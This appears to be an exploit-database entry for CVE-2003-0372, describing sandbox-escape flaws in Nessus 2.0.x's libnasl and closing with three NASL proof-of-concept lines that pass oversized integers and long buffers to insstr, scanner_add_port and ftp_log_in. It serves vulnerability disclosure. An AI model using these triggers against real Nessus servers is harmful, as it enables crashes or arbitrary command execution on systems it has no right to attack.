Nessus 2.0.x - LibNASL Arbitrary Code Execution

Author: Sir Mordred
type: dos
platform: multiple
port: 
date_added: 2003-05-22  
date_updated: 2012-11-12  
verified: 1  
codes: CVE-2003-0372;OSVDB-3190  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22634.txt  
source: https://www.securityfocus.com/bid/7664/info

Nessus has reported that various flaws have been discovered in the 'libnasl' library used by the Nessus application. As a result, a malicious NASL script may be able to break outside of the established sandbox environment and execute arbitrary commands on the local system.

Note that this malicious script must be a legitimate plugin that has been uploaded to the Nessus server. Furthermore, the affected Nessus application must have enabled the 'plugins_upload' option (which is disabled by default).

insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
ftp_log_in (socket : open_sock_tcp(21), pass : "11", user:crap (data:'A',length:8192) );